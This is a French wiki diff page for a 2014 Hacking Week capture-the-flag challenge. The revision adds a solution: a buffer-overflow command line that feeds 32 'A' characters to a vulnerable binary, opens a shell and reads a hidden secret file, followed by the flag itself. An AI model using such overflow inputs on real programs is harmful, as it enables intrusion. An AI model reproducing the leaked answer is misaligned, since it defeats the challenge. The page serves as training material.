Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
|
hackingweek_2014:exploit:exploit2 [2014/03/03 11:45] ganapati |
hackingweek_2014:exploit:exploit2 [2017/04/09 15:33] (Version actuelle) |
||
|---|---|---|---|
| Ligne 15: | Ligne 15: | ||
| return EXIT_SUCCESS; | return EXIT_SUCCESS; | ||
| } | } | ||
| + | </code> | ||
| + | |||
| + | |||
| + | Solution : | ||
| + | <code> | ||
| + | ./vulnerable `python -c 'print "A"*32'` | ||
| + | sh-4.2$ cat ./.secret | ||
| + | Kahwaujoo1 | ||
| </code> | </code> | ||